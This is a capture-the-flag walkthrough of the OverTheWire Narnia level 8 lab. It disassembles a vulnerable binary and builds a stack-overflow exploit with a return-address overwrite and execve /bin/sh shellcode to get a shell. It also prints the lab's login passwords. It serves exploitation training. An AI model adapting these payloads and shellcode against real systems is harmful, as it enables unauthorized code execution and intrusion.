So it’s been quite the adventure over the last few weeks going through the narnia challenges and it’s finally time for the very last challenge. I’ve seen quite a few different ways that folks have tackled this challenge, however I went for a slightly different solution. Instead of using an environment variable, we’ll instead use a combination of ltrace
and gdb
to determine the location of the payload passed into the program.
narnia8
How to log into Narnia:
ssh -p 2226 narnia8@narnia.labs.overthewire.org
Password: mohthuphog
Where to find all of the challenges:
cd /narnia/
And for the last time, try running the program to get an idea of what’s going on - skipping straight to passing some more excessive input to try and make it crash.
1
2
3
4
|
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A" * 1024'`
AAAAAAAAAAAAAAAAAAAAA????????????
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A" * 2048'`
AAAAAAAAAAAAAAAAAAAAA????????????
|
I wasn’t able to get it to crash, but did see some sort of corruption. This is what ltrace
shows:
1
2
3
4
5
6
|
narnia8@narnia:/narnia$ ltrace ./narnia8 `python -c 'print "A" * 2048'`
__libc_start_main(0x8048490, 2, 0xffffcf84, 0x80484d0 <unfinished ...>
memset(0xffffcec4, '\0', 20) = 0xffffcec4
printf("%s\n", "AAAAAAAAAAAAAAAAAAAAA\320\377\377\350\316\377\377\247\204\004\b"...AAAAAAAAAAAAAAAAAAAAA???????????
) = 37
+++ exited (status 0) +++
|
Trying a small value of A
:
1
2
3
4
5
6
|
narnia8@narnia:/narnia$ ltrace ./narnia8 `python -c 'print "A" * 64'`
__libc_start_main(0x8048490, 2, 0xffffd744, 0x80484d0 <unfinished ...>
memset(0xffffd684, '\0', 20) = 0xffffd684
printf("%s\n", "AAAAAAAAAAAAAAAAAAAAA'\377\377\250\326\377\377\247\204\004\b"...AAAAAAAAAAAAAAAAAAAAA'???????r???
) = 37
+++ exited (status 0) +++
|
What about information leakage?
1
2
3
4
5
|
narnia8@narnia:/narnia$ ltrace ./narnia8 `python -c 'print "%x" * 32'`
__libc_start_main(0x8048490, 2, 0xffffd744, 0x80484d0 <unfinished ...>
memset(0xffffd684, '\0', 20) = 0xffffd684
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
|
A segfault. Interesting. Worth keeping in mind while looking through the assembly:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
narnia8@narnia:/narnia$ objdump -M intel -d narnia8 | awk -F"\n" -v RS="\n\n" '$1 ~ /main>/'
08048490 <main>:
8048490: 55 push ebp
8048491: 89 e5 mov ebp,esp
8048493: 83 7d 08 01 cmp DWORD PTR [ebp+0x8],0x1
8048497: 7e 13 jle 80484ac <main+0x1c>
8048499: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]
804849c: 83 c0 04 add eax,0x4
804849f: 8b 00 mov eax,DWORD PTR [eax]
80484a1: 50 push eax
80484a2: e8 74 ff ff ff call 804841b <func>
80484a7: 83 c4 04 add esp,0x4
80484aa: eb 13 jmp 80484bf <main+0x2f>
80484ac: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]
80484af: 8b 00 mov eax,DWORD PTR [eax]
80484b1: 50 push eax
80484b2: 68 54 85 04 08 push 0x8048554
80484b7: e8 24 fe ff ff call 80482e0 <printf@plt>
80484bc: 83 c4 08 add esp,0x8
80484bf: b8 00 00 00 00 mov eax,0x0
80484c4: c9 leave
80484c5: c3 ret
80484c6: 66 90 xchg ax,ax
80484c8: 66 90 xchg ax,ax
80484ca: 66 90 xchg ax,ax
80484cc: 66 90 xchg ax,ax
80484ce: 66 90 xchg ax,ax
|
This is likely the print for the usage:
1
2
3
4
5
6
|
80484b2: 68 54 85 04 08 push 0x8048554
80484b7: e8 24 fe ff ff call 80482e0 <printf@plt>
# Verify in GDB
(gdb) x/s 0x8048554
0x8048554: "%s argument\n"
|
So the main
function isn’t very interesting it just checks to see if the argument isn’t null otherwise calls func
with the argument from the command line. By now it’s pretty obvious where argv[0]
comes from and indexing into it to get the values passed in:
1
2
3
4
5
6
7
8
9
10
11
|
8048499: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]
(gdb) x/wx $ebp+0xc
0xffffd6c4: 0xffffd754
804849c: 83 c0 04 add eax,0x4
(gdb) x/wx 0xffffd758
0xffffd758: 0xffffd896
(gdb) x/s 0xffffd896
0xffffd896: "AAAA" # And the value that was passed in.
|
This moves the address of argv[1]
into $eax
so it can be passed at the first (and only) parameter of func
:
1
2
3
|
804849f: 8b 00 mov eax,DWORD PTR [eax]
80484a1: 50 push eax
80484a2: e8 74 ff ff ff call 804841b <func>
|
Time for a deeper look into func
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
narnia8@narnia:/narnia$ objdump -M intel -d narnia8 | awk -F"\n" -v RS="\n\n" '$1 ~ /func>/'
0804841b <func>:
804841b: 55 push ebp
804841c: 89 e5 mov ebp,esp
804841e: 83 ec 18 sub esp,0x18
8048421: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
8048424: 89 45 fc mov DWORD PTR [ebp-0x4],eax
8048427: 6a 14 push 0x14
8048429: 6a 00 push 0x0
804842b: 8d 45 e8 lea eax,[ebp-0x18]
804842e: 50 push eax
804842f: e8 cc fe ff ff call 8048300 <memset@plt>
8048434: 83 c4 0c add esp,0xc
8048437: c7 05 b0 97 04 08 00 mov DWORD PTR ds:0x80497b0,0x0
804843e: 00 00 00
8048441: eb 26 jmp 8048469 <func+0x4e>
8048443: a1 b0 97 04 08 mov eax,ds:0x80497b0
8048448: 8b 15 b0 97 04 08 mov edx,DWORD PTR ds:0x80497b0
804844e: 89 d1 mov ecx,edx
8048450: 8b 55 fc mov edx,DWORD PTR [ebp-0x4]
8048453: 01 ca add edx,ecx
8048455: 0f b6 12 movzx edx,BYTE PTR [edx]
8048458: 88 54 05 e8 mov BYTE PTR [ebp+eax*1-0x18],dl
804845c: a1 b0 97 04 08 mov eax,ds:0x80497b0
8048461: 83 c0 01 add eax,0x1
8048464: a3 b0 97 04 08 mov ds:0x80497b0,eax
8048469: a1 b0 97 04 08 mov eax,ds:0x80497b0
804846e: 89 c2 mov edx,eax
8048470: 8b 45 fc mov eax,DWORD PTR [ebp-0x4]
8048473: 01 d0 add eax,edx
8048475: 0f b6 00 movzx eax,BYTE PTR [eax]
8048478: 84 c0 test al,al
804847a: 75 c7 jne 8048443 <func+0x28>
804847c: 8d 45 e8 lea eax,[ebp-0x18]
804847f: 50 push eax
8048480: 68 50 85 04 08 push 0x8048550
8048485: e8 56 fe ff ff call 80482e0 <printf@plt>
804848a: 83 c4 08 add esp,0x8
804848d: 90 nop
804848e: c9 leave
804848f: c3 ret
|
First up, allocate 0x18 (24)
bytes on the stack:
1
|
804841e: 83 ec 18 sub esp,0x18
|
Load the address of what was passed into the function into $eax
:
1
|
8048421: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
|
Then store that address into a local pointer in the function:
1
|
8048424: 89 45 fc mov DWORD PTR [ebp-0x4],eax
|
Next up is to setup the memset
for the local array:
1
2
3
4
5
|
8048427: 6a 14 push 0x14
8048429: 6a 00 push 0x0
804842b: 8d 45 e8 lea eax,[ebp-0x18]
804842e: 50 push eax
804842f: e8 cc fe ff ff call 8048300 <memset@plt>
|
The size of the array is 0x14 (20)
bytes:
1
|
8048427: 6a 14 push 0x14
|
Which makes sense given that we are using 0x4
bytes for the pointer and 0x14
for the array, which matches the 0x18
that was reserved. Next up another one of those non-obvious at first loops.
Set the initial value from some globally stored loop counter:
1
2
|
8048437: c7 05 b0 97 04 08 00 mov DWORD PTR ds:0x80497b0,0x0
804843e: 00 00 00
|
Jump all the way to where the test will happen:
1
2
|
8048441: eb 26 jmp 8048469 <func+0x4e>
…code that will be explored after explaining the loop…
|
Load the contents of the loop counter $edx
. Move the address of our local pointer into $eax
. Add the address of what we passed in to our loop variable value, given that we know it’s argv[1]
, it’s an array index. Move (and zero extend) the newly computed value into $eax
. Check the lowest 8 bits (a byte) against themselves. If they aren’t equal, then jump into the loop body.
1
2
3
4
5
6
7
|
8048469: a1 b0 97 04 08 mov eax,ds:0x80497b0
804846e: 89 c2 mov edx,eax # Loop counter (i)
8048470: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] # Addr of argv[1][]
8048473: 01 d0 add eax,edx # Index into argv[1][i]
8048475: 0f b6 00 movzx eax,BYTE PTR [eax]
8048478: 84 c0 test al,al # if al == 0 -> ZF = 1
804847a: 75 c7 jne 8048443 <func+0x28> # if ZF != 1 -> jmp, in other words if argv[1][i] == 0 exit loop
|
Time to breakdown the body of the loop. First up get the value of the loop counter, followed by the value of the local variable. Add local variable and the loop counter, given that we know the local variable is just a pointer to argv[1]
it’s just indexing into that char array. After that, store the address of the result into $edx
with zero extending. Store the result of the lower 8bits (aka byte) into the loop index of the local array, aka array[i]
. Finally increment the loop counter and start the loop condition checking all over:
1
2
3
4
5
6
7
8
9
10
|
8048443: a1 b0 97 04 08 mov eax,ds:0x80497b0 # Loop counter from data segment
8048448: 8b 15 b0 97 04 08 mov edx,DWORD PTR ds:0x80497b0 # Loop counter from data segment
804844e: 89 d1 mov ecx,edx
8048450: 8b 55 fc mov edx,DWORD PTR [ebp-0x4] # argv[1]
8048453: 01 ca add edx,ecx
8048455: 0f b6 12 movzx edx,BYTE PTR [edx] # argv[1][i]
8048458: 88 54 05 e8 mov BYTE PTR [ebp+eax*1-0x18],dl # [ebp-0x18] is the start of local array[], eax*1 is [i]
804845c: a1 b0 97 04 08 mov eax,ds:0x80497b0
8048461: 83 c0 01 add eax,0x1 # increment loop counter
8048464: a3 b0 97 04 08 mov ds:0x80497b0,eax
|
Lastly print out the contents of the local array:
1
2
3
4
|
804847c: 8d 45 e8 lea eax,[ebp-0x18]
804847f: 50 push eax
8048480: 68 50 85 04 08 push 0x8048550
8048485: e8 56 fe ff ff call 80482e0 <printf@plt>
|
Thinking through what the breakdown, the pseudo “C” code for the whole function would likely look something like this:
1
2
3
4
5
6
7
8
9
10
|
void func(char* argv) {
char* ptr;
char array[20];
ptr = argv;
memset(array, 0x0, 0x20);
for (i = 0; ptr[i] != 0; i++) {
array[i] = ptr[i];
}
printf("%s\n", array);
}
|
The important thing here is that the loop variable is not defined within the function itself nor within the loop. Instead the loop counter is actually part of the Data Segment. The other thing to note is that the loop will continue until it gets a terminator character in the array. Finally, the stack is laid out is interesting. If we dump the stack right after the memset
:
1
2
3
4
5
6
7
8
9
10
|
(gdb) b *8048434
(gdb) r `python -c 'print "A"*32'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 `python -c 'print "A"*32'`
(gdb) x/40xw $esp
0xffffd684: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd694: 0x00000000 0xffffd886 0xffffd6a8 0x080484a7
0xffffd6a4: 0xffffd886 0x00000000 0xf7e2a286 0x00000002
|
We can see that the local buffer, (0xffffd684: <0x00000000 * 5>
) and the pointer to argv[1]
(0xffffd698: 0xffffd886
) are adjacent to each other:
1
2
|
(gdb) x/s 0xffffd886
0xffffd886: 'A' <repeats 32 times>
|
Each time through the loop the address at the local pointer is dereferenced and the data at that location is copied to the local buffer (array[]
). When the copy overflows past the size of the local buffer it will actually change the address pointed to by the local pointer (ptr
). The next iteration through the loop then dereferences the new overwritten address being pointed to by the local pointer and tries to compare and copy that data.
1
2
3
4
5
6
7
8
9
10
11
12
|
(gdb) x/40xw $esp
0xffffd684: 0x00000000 0x00000000 0x00000000 0x00000000 # Before any copies
0xffffd694: 0x00000000 0xffffd886 0xffffd6a8 0x080484a7 # Note that ptr is 0xffffd886
...and running through to fill up the buffer and overflow once...
(gdb) x/40xw $esp
0xffffd674: 0x41414141 0x41414141 0x41414141 0x41414141 # Note that the "A"s have filled up the buffer
0xffffd684: 0x41414141 0xffffd841 0xffffd698 0x080484a7 # Notice that ptr is now 0xffffd841
..continue execution one more time...
(gdb) x/40xw $esp
0xffffd674: 0x41414141 0x41414141 0x41414141 0x41414141 # Loop copies all of the "A" to the buffer
0xffffd684: 0x41414141 0xffff0641 0xffffd698 0x080484a7 # Loop continues to copy the contents of "A" to
# the buffer and then overflows changing addr of the ptr
|
Knowing that we can control the overflow, it should be possible to use this to exploit the program. One of the biggest challenges is to maintain the value of ptr
to ensure that it doesn’t get changed and always points to our input data. Accomplishing this should allow for smashing the stack and executing and code desired.
With that in mind the payload necessary to accomplish this looks like:
1
|
[junk data to fill array][address of ptr][junk data to clobber the stack][address of shell code to jump to replacing ret][shell code we'd want to execute]
|
Now to prove this out and take control of the return address:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
(gdb) r `python -c 'print "A"*20 + "\x66\xd8\xff\xff" + "CCCCDDDDEEEEFFFFGGGGHHHHIIII"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 `python -c 'print "A"*20 + "\x66\xd8\xff\xff" + "CCCCDDDDEEEEFFFFGGGGHHHHIIII"'`
Breakpoint 1, 0x08048434 in func ()
(gdb) c
Continuing.
Breakpoint 2, 0x0804847c in func ()
(gdb) x/40xw $esp
0xffffd664: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd674: 0x41414141 0xffffd866 0x43434343 0x44444444
0xffffd684: 0x45454545 0x46464646 0x47474747 0x48484848
0xffffd694: 0x49494949 0xffffd730 0x00000000 0x00000000
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAf???CCCCDDDDEEEEFFFFGGGGHHHHIIII0???
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
|
SIGSEV
and 0x44444444
means that we’ve sucessfully got control over the return address. Next step is to replace the payload with the shellcode used from the earlier narnia’s. Using GDB to verify and re-fill in the addresses before running - like we’ve seen in the past addresses tend to move around a bit, so double check:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
(gdb) r `python -c 'print "A"*20 + "\x49\xd8\xff\xff" + "CCCC"+ "\x64\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /narnia/narnia8 `python -c 'print "A"*20 + "\x49\xd8\xff\xff" + "CCCC"+ "\x64\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
Breakpoint 1, 0x08048434 in func ()
(gdb) ni
0x08048437 in func ()
(gdb) x/40xw $esp
0xffffd644: 0x00000000 0x00000000 0x00000000 0x00000000 # This is before any copies of our payload
0xffffd654: 0x00000000 0xffffd849 0xffffd668 0x080484a7
0xffffd664: 0xffffd849 0x00000000 0xf7e2a286 0x00000002
0xffffd674: 0xffffd704 0xffffd710 0x00000000 0x00000000
0xffffd684: 0x00000000 0xf7fc5000 0xf7ffdc0c 0xf7ffd000
0xffffd694: 0x00000000 0x00000002 0xf7fc5000 0x00000000
0xffffd6a4: 0x1885e29b 0x226d8e8b 0x00000000 0x00000000
0xffffd6b4: 0x00000000 0x00000002 0x08048320 0x00000000
0xffffd6c4: 0xf7fee710 0xf7e2a199 0xf7ffd000 0x00000002
0xffffd6d4: 0x08048320 0x00000000 0x08048341 0x08048490
(gdb) c
Continuing.
|
There we have it, we successfully took control and wrote all of the shellcode we could ever dream of:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
Breakpoint 2, 0x0804847c in func ()
(gdb) x/40xw $esp
0xffffd644: 0x41414141 0x41414141 0x41414141 0x41414141 # After our payload has been copied
0xffffd654: 0x41414141 0xffffd849 0x43434343 0xffffd664
0xffffd664: 0x315e1aeb 0x074688c0 0x5e891e8d 0x0c468908
0xffffd674: 0xf3890bb0 0x8d084e8d 0x80cd0c56 0xffffe1e8
0xffffd684: 0x69622fff 0x68732f6e 0x4141414a 0x42424241
0xffffd694: 0x00000042 0x00000002 0xf7fc5000 0x00000000
0xffffd6a4: 0x1885e29b 0x226d8e8b 0x00000000 0x00000000
0xffffd6b4: 0x00000000 0x00000002 0x08048320 0x00000000
0xffffd6c4: 0xf7fee710 0xf7e2a199 0xf7ffd000 0x00000002
0xffffd6d4: 0x08048320 0x00000000 0x08048341 0x08048490
# Continuing should give us a shell.
(gdb) c
Continuing.
$ whoami
narnia8
|
With confidence that this will work within gdb
it’s time to try it out for real and finish this challenge:
1
2
3
4
|
narnia8@narnia:/narnia$ ./narnia `python -c 'print "A"*20 + "\x49\xd8\xff\xff" + "CCCC"+ "\x64\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`^C
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x49\xd8\xff\xff" + "CCCC"+ "\x64\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
AAAAAAAAAAAAAAAAAAAAI/???????g???
narnia8@narnia:/narnia$
|
Well that didn’t work as planned, no shell was spawned and it just printed out the garbage like before. This would mean that the address used in our payload wasn’t actually pointing to the right place and that using the addresses from gdb
won’t work this time. So we need to figure out the address another way, luckily it should be possible to leak information using ltrace
:
1
2
3
4
5
6
|
narnia8@narnia:/narnia$ ltrace ./narnia8 `python -c 'print "A"*20 + "\x49\xd8\xff\xff" + "CCCC"+ "\x64\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
__libc_start_main(0x8048490, 2, 0xffffd734, 0x80484d0 <unfinished ...>
memset(0xffffd674, '\0', 20) = 0xffffd674
printf("%s\n", "AAAAAAAAAAAAAAAAAAAAIa\377\377\230\326\377\377\247\204\004\b"...AAAAAAAAAAAAAAAAAAAAIa???????a???
) = 37
+++ exited (status 0) +++
|
The memset
shows that the local buffer’s (array[]
) address changed. Now for some magic, we can use this bit of information to calculate the location of ptr
, where the return address is, and most importantly where the shellcode is going to be located.
Starting with the array[20]
, get the address of ptr
:
1
|
0xffffd674 + 20 bytes for size of array = 0xffffd688
|
Next the address of the shell code, which should be 12 bytes
after the address of ptr
:
1
|
0xffffd688 + 12 bytes past ptr = 0xffffd694
|
Fixing the addresses in the exploit:
1
|
./narnia8 `python -c 'print "A"*20 + "\x88\xd6\xff\xff" + "CCCC"+ "\x94\xd6\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
|
Well hmm, so that still didn’t work out. For whatever reason we can’t seem to get the real addresses of the stack when running the program with ltrace
or the gdb
, so back to the drawing board. It was time to start over and think through everything from the beginning, going all the way to the original running of the program:
1
2
|
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A"*20'`
AAAAAAAAAAAAAAAAAAAA?????????????
|
It looks like the program’s output is the buffer, since the buffer isn’t null
terminated and we have exactly 20 “A"s in it, the printf
should continue on printing whatever else is in the stack until it reaches a null terminator. Which means the address of our original buffer should be visible, in otherwords those ?????
actually contain valuable data that we just need to be able to view. A hex dumper like xxd will allow us to view the output from narnia8
in a manner that should reveal what those ?????
actually represent. Piping the output from narnia8
into xxd
should do the trick:
1
2
3
4
|
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A"*20'` | xxd -g 4
00000000: 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA
00000010: 41414141 a9d8ffff d8d6ffff a7840408 AAAA............
00000020: a4d8ffff 0a .....
|
So sure enough that is the address. The next thing to be mindful of is that as the size of the input data changes, the addresses will shift a bit. We should be able to use gdb
to help determine how much these addresses shift:
1
2
3
4
5
6
7
|
(gdb) r `python -c 'print "A"*20'`
Starting program: /narnia/narnia8 `python -c 'print "A"*20'`
Breakpoint 1, 0x08048437 in func ()
(gdb) x/40xw $esp
0xffffd684: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd694: 0x00000000 0xffffd886 0xffffd6a8 0x080484a7
|
So the address of our input buffer (argv[1]
) inside of gdb
with a length of 20 is 0xffffd886
and is located at 0xffffd698
. With a the input buffer containing shellcode has an address of 0xffffd849
, and is located here at 0xffffd658
. The difference between these two on the stack is 0xffffd886 - 0xffffd849 = 0x3d
. If we make the assumption that this difference should always hold up, we should be able to go back to the output from xxd
and use the address it has to calculate exactly what we need for our payload.
So if the A * 20
input buffer is located at 0xffffd8a9
and use the assumption that 0x3d
will always hold up, the address of the longer payload that we actually need can be calculated as 0xffffd8a9 - 0x3d = 0xffffd86c
.
Which gives the payload:
1
2
3
4
5
6
|
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x6c\xd8\xff\xff" + "CCCC"+ "\x82\xd8\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
AAAAAAAAAAAAAAAAAAAAg???CCCCAAAA?^1??F???F
?
???V
̀?????/bin/shJAAAABBBB
Segmentation fault
|
We’re almost there, especially since we can see the string for our shellcode. The piece that’s missing is the address of the shellcode. Since it’s all contained in the same payload that we are providing as input, we already know the address, just have to calculate it. The input buffer looks like:
1
|
[20 bytes for junk][4 bytes addr][4 bytes for junk][4 bytes for addr to shellcode][Shellcode]
|
In other words, there’s 32 bytes
from the start off the input buffer to the start of the shellcode.
That gives the following address for the start of the shellcode offset from the start off the input buffer:
0xffffd86c + 0x20 = 0xffffd88c
With the updated addresses our payload should now be complete and spawn a shell:
1
2
3
4
5
6
7
|
narnia8@narnia:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x6c\xd8\xff\xff" + "CCCC"+ "\x8c\xd8\xff\xff" + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x42\x42\x42\x42"'`
AAAAAAAAAAAAAAAAAAAAl???CCCC?????^1??F???F
?
???V
̀?????/bin/shJAAAABBBB
$ whoami
narnia9
|
And the flag:
1
2
|
$ cat /etc/narnia_pass/narnia9
eiL5fealae
|
This challenge was by far one of my favorites and also one of the most frustrating. After completing this challenge I looked around online to see how others solved it and most of the solutions I came across all relied on using the address of an env
variable, which in hindsight would have been quite a bit easier as there are quite a few tricks that allow for easily determine that address. However, I’m quite pleased with this solution, especially since it required thinking very carefully about how the contents of the stack are all laid out. It’s also worth nothing that with control over the return address many other techniques (like Return-To-X) could be used to spawn a shell or whatever else you’d like.